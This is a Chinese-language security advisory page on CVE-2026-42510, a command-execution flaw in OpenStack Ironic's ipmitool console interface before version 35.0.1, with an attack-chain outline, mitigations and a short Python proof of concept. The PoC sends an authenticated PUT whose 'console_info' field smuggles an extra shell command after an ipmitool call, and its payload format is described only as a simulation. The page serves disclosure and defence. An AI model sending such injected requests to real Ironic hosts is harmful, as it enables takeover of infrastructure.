CVE-2026-42510 CVSS 6.6 中危

CVE-2026-42510 OpenStack Ironic ipmitool执行漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42510

漏洞类型

远程代码执行

CVSS评分

6.6 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

OpenStack Ironic

漏洞概述

OpenStack Ironic 在 35.0.1 版本之前存在安全漏洞。该漏洞源于在非默认配置中启用了控制台接口，导致允许执行 ipmitool。攻击者可利用此漏洞在满足特定权限和配置条件下，通过操纵相关参数执行任意系统命令，从而影响系统的机密性、完整性和可用性。建议用户尽快升级至安全版本。

技术细节

该漏洞主要影响 OpenStack Ironic 的裸机管理服务。Ironic 使用 `ipmitool` 与基板管理控制器（BMC）进行通信以管理电源和控制台。在 35.0.1 之前的版本中，当 Ironic 被配置为使用非默认控制台接口时，系统对 `ipmitool` 命令的调用构建过程存在逻辑缺陷。攻击者需要具备高权限（PR:H），即通常为云管理员或项目所有者身份。利用该漏洞时，攻击者可以通过网络向 Ironic API 发送特制的请求，在控制台操作参数中注入恶意指令。由于参数处理不当，这些指令可能被传递给底层执行环境，导致在 Ironic Conductor 宿主机上执行任意代码，进而完全控制节点。

攻击链分析

STEP 1

侦察

攻击者识别目标环境中运行 OpenStack Ironic 服务的节点，并确认其版本低于 35.0.1。

STEP 2

获取权限

攻击者获取高权限账号（如云管理员或项目所有者），满足 CVSS 向量中的 PR:H 要求。

STEP 3

漏洞利用

攻击者向 Ironic API 发送特制的控制台设置请求，利用非默认配置中的 ipmitool 执行缺陷注入恶意命令。

STEP 4

命令执行

Ironic 服务在处理请求时，调用 `ipmitool` 并执行了攻击者注入的附加命令。

STEP 5

达成影响

攻击者在底层主机上获得执行权限，导致数据泄露、篡改或服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target Ironic API endpoint for a specific node
TARGET_URL = "http://ironic-api:6385/v1/nodes/{node_uuid}/console"
ADMIN_TOKEN = "<admin_token>"  # Requires High Privilege (PR:H)
NODE_UUID = "<target_node_uuid>"

# Malicious payload intended to exploit ipmitool execution
# This simulates injecting a command chain via the console interface configuration
PAYLOAD = {
    "enabled": True,
    "console_info": "ipmitool -H <bmc_ip> -U admin -P pass sol activate; touch /tmp/pwned; #"
}

headers = {
    "X-Auth-Token": ADMIN_TOKEN,
    "Content-Type": "application/json"
}

try:
    response = requests.put(TARGET_URL.format(node_uuid=NODE_UUID), json=PAYLOAD, headers=headers)
    if response.status_code == 200 or response.status_code == 202:
        print("[+] PoC request sent successfully. Check host for command execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

OpenStack Ironic < 35.0.1

防御指南

临时缓解措施

临时缓解措施包括：如果业务不需要，建议暂时禁用 Ironic 的控制台接口功能；严格限制拥有高权限的用户访问，仅允许受信任的管理员进行节点操作；在网络层面隔离 Ironic Conductor 节点，防止潜在的横向移动。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表